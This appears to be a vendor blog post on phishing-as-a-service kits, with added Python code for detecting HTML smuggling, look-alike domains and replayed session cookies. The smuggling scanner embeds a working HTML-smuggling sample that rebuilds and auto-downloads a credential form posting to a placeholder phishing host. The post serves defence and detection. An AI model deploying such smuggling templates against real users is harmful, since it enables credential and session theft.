Modern Phishing Kits: Tycoon, Greatness, EvilProxy, Mamba 2FA

Manish Garg, Associate of (ISC)² · RingSafe
Apr 25, 2026
3 min read

Last updated: April 26, 2026

The 2024-2026 phishing landscape is dominated by Phishing-as-a-Service (PhaaS) kits. Tycoon, Greatness, EvilProxy, and a handful of similar operations sell ready-made adversary-in-the-middle (AiTM) phishing infrastructure on subscription: a reverse proxy that relays the victim's real login to Microsoft or Google, so the kit captures the password, the completed MFA, and the resulting session cookie in one pass. Operators get pre-configured M365 / Google Workspace templates, evasion features, operator dashboards, and infrastructure rotation for roughly $250-$1500/month. This article maps the kit ecosystem, the IoCs each kit produces, and what defensive teams should monitor.

The PhaaS economics

Building custom AiTM phishing infrastructure requires technical skill: Evilginx2 configuration, hosting, look-alike domains, and evading takedowns. PhaaS kits commoditise all of this. Subscribers get:

  • Web UI for campaign management
  • Templates for major IdPs (Microsoft, Google, Okta, AWS, Adobe)
  • Auto-rotating infrastructure (domains, IPs)
  • Anti-detection features (CAPTCHA gating, geo-fencing, bot detection)
  • Captured-credential dashboard with session-cookie export
  • Telegram bot integration for real-time notifications

This puts AiTM phishing within reach of attackers with little technical skill. The result is scale: Indian fintech and BFSI customer-facing portals see hundreds to thousands of look-alike phishing domains active at any time.

The kits

Tycoon (sold as Tycoon 2FA)

One of the most active kits of 2024-25, sold in subscription tiers. Notable for:

  • High-quality M365 phishing templates with pixel-perfect branding
  • A “VIP” tier with exclusive domains and faster replacement of taken-down infrastructure
  • Captured session cookies exported from the panel so the operator can replay the victim's session without touching MFA again

Greatness

Microsoft 365-focused PhaaS. Its delivery relies heavily on HTML smuggling: the phishing email carries an .htm/.html attachment, and JavaScript inside it decodes an embedded base64 blob and reconstructs the phishing page (or a dropper file) locally in the victim's browser. Because no link appears in the message body, email-gateway URL scanning never sees the phishing page.
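To make the delivery pattern concrete, the following is an added example (not code from the article, from Greatness, or from any real sample): a constructed, deliberately minimal HTML attachment that rebuilds a page from a base64 blob the way the paragraph describes, next to a small scanner that flags the JavaScript constructs and decodes the embedded blob. Domain names, the `Invoice.html` filename and the indicator list are illustrative assumptions.

```python
import base64
import re

# Constructed sample: a minimal HTML attachment that rebuilds a page client-side
# from a base64 blob, the delivery pattern this article attributes to Greatness.
# It is an illustrative mock, not a real kit sample; the domain is a placeholder.
INNER_PAGE = (
    "<html><body><form method='post' action='https://login.example-phish.test/'>"
    "<input name='user'><input name='pass' type='password'></form></body></html>"
)
SMUGGLED_HTML = f"""<html><body><p>Loading your document...</p>
<script>
var b = atob("{base64.b64encode(INNER_PAGE.encode()).decode()}");
var bytes = new Uint8Array(b.length);
for (var i = 0; i < b.length; i++) bytes[i] = b.charCodeAt(i);
var blob = new Blob([bytes], {{type: "text/html"}});
var url = URL.createObjectURL(blob);
var a = document.createElement("a"); a.href = url; a.download = "Invoice.html"; a.click();
</script></body></html>"""

# JavaScript constructs that, in combination, indicate client-side file reconstruction.
INDICATORS = {
    "atob": re.compile(r"\batob\s*\("),
    "blob_ctor": re.compile(r"new\s+Blob\s*\("),
    "object_url": re.compile(r"URL\.createObjectURL\s*\("),
    "ms_save_blob": re.compile(r"msSaveOrOpenBlob|msSaveBlob"),
    "download_attr": re.compile(r"\.download\s*="),
    "auto_click": re.compile(r"\.click\s*\(\s*\)"),
}


def sniff(payload: bytes) -> str:
    """Tiny type sniffer for a decoded blob (magic bytes, then an HTML tag check)."""
    if payload.startswith(b"%PDF"):
        return "pdf"
    if payload.startswith(b"PK\x03\x04"):
        return "zip"  # also docx/xlsx and other Office containers
    if payload.startswith(b"MZ"):
        return "pe"
    if re.search(rb"<(html|script|form)\b", payload, re.I):
        return "html"
    return "unknown"


def scan_html_attachment(html: str, min_blob_len: int = 100) -> dict:
    """Score an .htm/.html attachment for HTML-smuggling traits.

    Returns the matched JavaScript indicators, every decodable base64 literal of at
    least min_blob_len characters (with a sniffed type), and a verdict. Real kit
    samples carry blobs of tens of kilobytes; the threshold is low here only so the
    constructed sample above triggers.
    """
    hits = [name for name, rx in INDICATORS.items() if rx.search(html)]
    blob_rx = re.compile(r"[\"']([A-Za-z0-9+/]{%d,}={0,2})[\"']" % min_blob_len)
    payloads = []
    for blob in blob_rx.findall(html):
        try:
            data = base64.b64decode(blob, validate=True)
        except ValueError:  # binascii.Error is a ValueError subclass
            continue
        payloads.append({"size": len(data), "type": sniff(data)})
    decodes = "atob" in hits
    writes_file = bool({"object_url", "ms_save_blob", "download_attr"} & set(hits))
    # atob alone is common in benign pages; require decode + file write, or a
    # decoded blob that is itself a page or an executable.
    verdict = (decodes and writes_file) or any(p["type"] in ("html", "pe") for p in payloads)
    return {"indicators": hits, "payloads": payloads, "verdict": verdict}


if __name__ == "__main__":
    print(scan_html_attachment(SMUGGLED_HTML))
```

Run as-is it prints the indicator list, one decoded payload typed as `html`, and `verdict: True`; a page that merely calls `atob()` on a short string scores no verdict, which is the point of requiring the decode-plus-write combination rather than any single API.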

EvilProxy / Caffeine

Two separate kits built on the same reverse-proxy AiTM pattern, both first documented publicly in 2022 and both sold through operator panels with M365 templates. EvilProxy has stayed active through 2023-24 in campaigns against executives and finance staff; Caffeine is a distinct brand rather than a rebrand of it. Technically they behave the same way as the kits above: the victim types into a proxied copy of the real login page and the operator receives the password, the MFA completion and the session cookie.

Mamba 2FA

Newer entrant, documented in 2024, specifically advertising “MFA bypass”; translation: AiTM relay of the genuine login, not a weakness in MFA itself. Its templates impersonate Microsoft 365 sign-in pages, and captured credentials and cookies are pushed to the operator in real time over a Telegram bot.

Storm-1167 / Robin Banks

Both target financial services specifically. Storm-1167 is Microsoft's tracking designation for an AiTM phishing and BEC operation observed against banking and financial-services organisations; Robin Banks is a kit brand marketed to operators phishing bank customers.

IoCs to monitor

  • Look-alike domains for your brand: punycode/homoglyph, hyphenated and token-appended variants, TLD substitution. Run continuous detection (dnstwist, Certificate Transparency log monitoring, commercial brand protection)
  • HTML smuggling indicators: emails carrying .htm/.html attachments whose JavaScript decodes an embedded base64 blob and writes it out as a file or page
  • Suspicious M365 sign-in patterns: sign-ins from anonymiser/VPN exits, residential-proxy ranges, or hosting/VPS networks never previously seen for that user
  • Token replay: the same session ID (the SessionId field in Entra sign-in logs) appearing from two distant locations within minutes, the signature of a stolen session cookie being replayed from the kit's infrastructure
  • User-agent anomalies: sign-ins whose OS/browser string is inconsistent with the user's usual device (a replayed session often carries the browser of the operator's host, not the victim's)
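The first bullet is easy to operationalise in a few lines. The block below is an added example, not the article's own tooling or any named product: it generates the variant classes the bullet lists for one brand (TLD swaps, hyphen and token variants, single-character homoglyphs emitted as punycode) and then classifies a constructed list of “newly seen” domains against the brand, catching near-misses the generator did not enumerate by edit distance, homoglyph folding and brand-token containment. The brand `examplebank.com`, the observed domains and the small confusables map are assumptions for the demo; a real deployment would feed it from a CT-log stream or a registrar zone feed and use the full Unicode confusables list.

```python
# Added example: look-alike domain generation and classification for one brand.
# The brand, the observed-domain list and the confusables map are constructed.

# A few confusable characters common in IDN look-alikes. Unicode's confusables.txt
# is far larger; this map is deliberately small.
HOMOGLYPHS = {
    "a": ["\u0430"],         # Cyrillic a
    "e": ["\u0435"],         # Cyrillic e
    "o": ["\u043e", "0"],    # Cyrillic o, digit zero
    "c": ["\u0441"],         # Cyrillic es
    "p": ["\u0440"],         # Cyrillic er
    "i": ["1", "l"],
    "l": ["1", "i"],
}
# Reverse map for non-ASCII glyphs only (folding 0->o or 1->l would also rewrite
# legitimate digits, so ASCII confusables are handled by edit distance instead).
FOLD = {g: a for a, glyphs in HOMOGLYPHS.items() for g in glyphs if ord(g) > 127}
SWAP_TLDS = ["com", "co", "net", "org", "in", "co.in", "app"]
TOKENS = ["login", "secure", "verify", "mail", "support"]


def split_domain(domain):
    """Split 'examplebank.co.in' into ('examplebank', 'co.in').

    Assumes the registrable domain is passed (no subdomains); a real pipeline
    would use the Public Suffix List.
    """
    sld, _, tld = domain.lower().partition(".")
    return sld, tld


def generate_variants(brand_domain):
    sld, tld = split_domain(brand_domain)
    variants = set()
    for t in SWAP_TLDS:                      # TLD substitution
        if t != tld:
            variants.add(f"{sld}.{t}")
    for tok in TOKENS:                       # token-appended / prepended
        variants.add(f"{sld}-{tok}.{tld}")
        variants.add(f"{tok}-{sld}.{tld}")
    for i in range(1, len(sld)):             # hyphen inserted inside the label
        variants.add(f"{sld[:i]}-{sld[i:]}.{tld}")
    for i, ch in enumerate(sld):             # single homoglyph, punycoded if non-ASCII
        for g in HOMOGLYPHS.get(ch, []):
            label = (sld[:i] + g + sld[i + 1:]).encode("idna").decode("ascii")
            variants.add(f"{label}.{tld}")
    return variants


def levenshtein(a, b):
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def fold_homoglyphs(label):
    return "".join(FOLD.get(ch, ch) for ch in label)


def flag_lookalikes(brand_domain, observed, max_edits=1):
    """Classify newly seen domains against one brand. Returns [(domain, reason)]."""
    brand_sld, brand_tld = split_domain(brand_domain)
    variants = generate_variants(brand_domain)
    flagged = []
    for d in observed:
        d = d.lower().rstrip(".")
        if d == brand_domain.lower():
            continue
        sld, tld = split_domain(d)
        try:  # decode punycode so Cyrillic/Latin mixes are compared in Unicode form
            uni = sld.encode("ascii").decode("idna") if sld.startswith("xn--") else sld
        except UnicodeError:
            uni = sld
        folded = fold_homoglyphs(uni)
        if d in variants:
            flagged.append((d, "generated-variant"))
        elif folded == brand_sld:
            flagged.append((d, "homoglyph/tld"))
        elif levenshtein(folded, brand_sld) <= max_edits:
            flagged.append((d, "edit-distance"))
        elif brand_sld in folded.replace("-", ""):
            flagged.append((d, "brand-token"))
    return flagged


# Constructed "newly registered" domains, including a double-Cyrillic IDN that the
# single-substitution generator does not enumerate but the fold still catches.
CYR_A = "\u0430"
DOUBLE_CYRILLIC = ("ex" + CYR_A + "mpleb" + CYR_A + "nk").encode("idna").decode("ascii") + ".com"
OBSERVED = [
    "examplebank-login.com", "exanplebank.com", "examplebank.co",
    DOUBLE_CYRILLIC, "secure-examplebank-portal.net",
    "totally-unrelated.org", "examplebank.com",
]

if __name__ == "__main__":
    for domain, reason in flag_lookalikes("examplebank.com", OBSERVED):
        print(f"{reason:18} {domain}")
```

The order of the checks matters: exact generated variants first, then the homoglyph fold (which is what turns `xn--…` back into something comparable), then edit distance, then brand-token containment as the broadest and noisiest rule. In production the noisiest rule is the one to rate-limit or route to a lower-priority queue.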

Detection pipeline

  1. Look-alike domain monitoring: alert on new registrations and new TLS certificates for names close to your brand. Tools: dnstwist, OpenSquat, Certificate Transparency feeds (crt.sh, certstream), commercial brand protection (Recorded Future, BrandShield). PhishTank and OpenPhish are feeds of reported phishing URLs, useful for blocking but not for catching a domain at registration time
  2. Email security with link detonation and attachment analysis: Defender for Office 365, Mimecast, Proofpoint sandbox both links and .html attachments
  3. M365 sign-in risk: Entra ID Identity Protection risk detections (anonymous IP address, unfamiliar sign-in properties, anomalous token); alert on high-risk sign-ins and require re-authentication with phishing-resistant MFA
  4. SIEM correlation: an anomalous sign-in (new network, new browser, shared session ID across locations) followed by anomalous activity such as new inbox rules, MFA method changes or bulk mail access
  5. User reporting workflow: an easy “report phishing” button in the mail client; investigate every report and feed the latest delivery patterns back into the rules above
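Steps 3 and 4 above come down to a handful of correlations over sign-in events. The block below is an added example, not the article's own detection content and not a Microsoft or SIEM-vendor rule: it runs three rules over constructed sign-in records shaped like a subset of Entra ID sign-in log fields (user, timestamp, IP, session ID, user agent), using a constructed IP enrichment table in place of a GeoIP/proxy feed and a constructed per-user browser baseline. The addresses, coordinates, tags and user accounts are all assumptions. The session-replay rule is the one that catches a stolen AiTM cookie: one session ID, two places, a travel speed no aircraft reaches.

```python
# Added example: sign-in log correlation for AiTM session replay, proxy sign-ins and
# user-agent drift. All records, IPs, coordinates and tags below are constructed.
import math
from collections import Counter
from datetime import datetime

# Constructed IP enrichment (GeoIP + proxy/hosting tag) standing in for a commercial
# feed. Addresses are documentation ranges; coordinates are city-level.
IP_INFO = {
    "203.0.113.10": {"geo": (19.076, 72.878), "tag": "isp"},         # Mumbai, home ISP
    "203.0.113.11": {"geo": (19.076, 72.878), "tag": "isp"},
    "198.51.100.7": {"geo": (50.111, 8.682), "tag": "hosting"},      # Frankfurt, VPS range
    "192.0.2.55":   {"geo": (12.972, 77.594), "tag": "anon-proxy"},  # Bengaluru, anonymiser exit
}

WIN_EDGE = "Mozilla/5.0 (Windows NT 10.0) Edge/124"
LINUX_CHROME = "Mozilla/5.0 (X11; Linux x86_64) Chrome/124"

# Constructed 30-day history used to learn each user's usual browser family.
BASELINE = [
    {"user": "alice@example.test", "ua": WIN_EDGE}, {"user": "alice@example.test", "ua": WIN_EDGE},
    {"user": "bob@example.test", "ua": WIN_EDGE},
]

# Constructed sign-in events for one morning. Alice's session s-1111 reappears
# from a Frankfurt VPS twelve minutes after her Mumbai login: replayed cookie.
SIGNINS = [
    {"user": "alice@example.test", "ts": "2026-04-25T08:55:00+00:00", "ip": "203.0.113.10",
     "sessionId": "s-1111", "ua": WIN_EDGE, "result": "success"},
    {"user": "alice@example.test", "ts": "2026-04-25T09:07:00+00:00", "ip": "198.51.100.7",
     "sessionId": "s-1111", "ua": LINUX_CHROME, "result": "success"},
    {"user": "bob@example.test", "ts": "2026-04-25T09:10:00+00:00", "ip": "203.0.113.11",
     "sessionId": "s-2222", "ua": WIN_EDGE, "result": "success"},
    {"user": "bob@example.test", "ts": "2026-04-25T09:40:00+00:00", "ip": "192.0.2.55",
     "sessionId": "s-2223", "ua": WIN_EDGE, "result": "success"},
]


def haversine_km(a, b):
    """Great-circle distance between two (lat, lon) pairs in kilometres."""
    la1, lo1, la2, lo2 = map(math.radians, (*a, *b))
    h = math.sin((la2 - la1) / 2) ** 2 + math.cos(la1) * math.cos(la2) * math.sin((lo2 - lo1) / 2) ** 2
    return 2 * 6371.0 * math.asin(math.sqrt(h))


def ua_family(ua):
    """Coarse OS/browser bucket; enough to separate the kit's host from the user's laptop."""
    os_ = "windows" if "Windows" in ua else "mac" if "Macintosh" in ua else "linux" if "Linux" in ua else "other"
    br = "edge" if "Edge" in ua else "chrome" if "Chrome" in ua else "other"
    return f"{os_}/{br}"


def correlate(signins, baseline, max_speed_kmh=900.0):
    """Return alerts [(user, rule, detail)] over successful sign-ins.

    session-replay: one sessionId seen from two IPs with implied speed > max_speed_kmh
    proxy-signin:   source IP tagged as an anonymiser exit or hosting/VPS range
    ua-anomaly:     browser family differs from the user's most common one in baseline
    """
    usual = {u: Counter(ua_family(r["ua"]) for r in baseline if r["user"] == u).most_common(1)[0][0]
             for u in {r["user"] for r in baseline}}
    rows = [dict(r, dt=datetime.fromisoformat(r["ts"]), info=IP_INFO.get(r["ip"]))
            for r in signins if r["result"] == "success"]
    rows.sort(key=lambda r: r["dt"])
    alerts, last_by_session = [], {}
    for r in rows:
        if r["info"] is None:
            continue  # unenriched IP: a real pipeline would queue it for lookup
        if r["info"]["tag"] in ("anon-proxy", "hosting"):
            alerts.append((r["user"], "proxy-signin", f'{r["ip"]} tagged {r["info"]["tag"]}'))
        if ua_family(r["ua"]) != usual.get(r["user"]):
            alerts.append((r["user"], "ua-anomaly", ua_family(r["ua"])))
        prev = last_by_session.get(r["sessionId"])
        if prev and prev["ip"] != r["ip"]:
            km = haversine_km(prev["info"]["geo"], r["info"]["geo"])
            hours = max((r["dt"] - prev["dt"]).total_seconds() / 3600, 1 / 3600)
            if km / hours > max_speed_kmh:
                alerts.append((r["user"], "session-replay",
                               f'{r["sessionId"]} {prev["ip"]}->{r["ip"]} {km:.0f} km in {hours * 60:.0f} min'))
        last_by_session[r["sessionId"]] = r
    return alerts


if __name__ == "__main__":
    for user, rule, detail in correlate(SIGNINS, BASELINE):
        print(f"{user:22} {rule:15} {detail}")
```

Two design points. The speed floor of one second avoids a division blow-up when two events share a timestamp, and the session-replay rule keys on session ID rather than user, because the kit operator's sign-in is a continuation of the victim's session, not a new authentication; a rule that only looks for a second successful MFA will never fire on AiTM.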

The defender stack

  • FIDO2 / passkeys for all admin accounts first, then all users (the credential is bound to the genuine origin, so a proxy on a look-alike domain cannot complete the ceremony and the kit captures nothing usable)
  • Conditional Access requiring a compliant or hybrid-joined device, plus a geo-fence for where your users actually sign in from
  • Token Protection in Entra ID where available (binds the sign-in session token to the device, so a replayed cookie from the kit's host is rejected; coverage is currently limited to supported Windows clients and a subset of apps)
  • MFA push number-matching instead of just-tap (defeats push-fatigue attacks; it does not stop AiTM, because the victim is completing the genuine prompt for the session the kit's proxy is establishing)
  • Email security that scans and detonates HTML attachments, not just links
  • Web filter blocking known phishing infrastructure (multiple feeds: PhishTank, OpenPhish, commercial)
  • User awareness built on recent kit examples (more impactful than abstract phishing training)

The takedown reality

Phishing kit operators run their infrastructure across compromised hosting, fast-flux DNS and residential proxy networks. Takedowns typically take 24-72 hours, and the operator is back up the next day on different infrastructure; for a PhaaS subscriber, domain replacement is a feature of the service. Defending via takedowns is whack-a-mole. Defending via FIDO2 plus Conditional Access is structural: it removes the thing the kit exists to steal.

The takeaway

PhaaS democratises AiTM phishing. The volume of campaigns hitting Indian enterprise customer-facing portals is now staggering. The defensive answer is not “block the next kit” — it is “make your authentication phishing-resistant by design.” FIDO2 + Conditional Access + Token Protection is the durable answer. Until rolled out, expect AiTM-driven account takeover incidents in your inbox.

Worried about your exposure?

Get a free attack-surface review

We check what an attacker would see about your business — leaked credentials, exposed services, dark-web mentions. 30 minutes, no obligation.
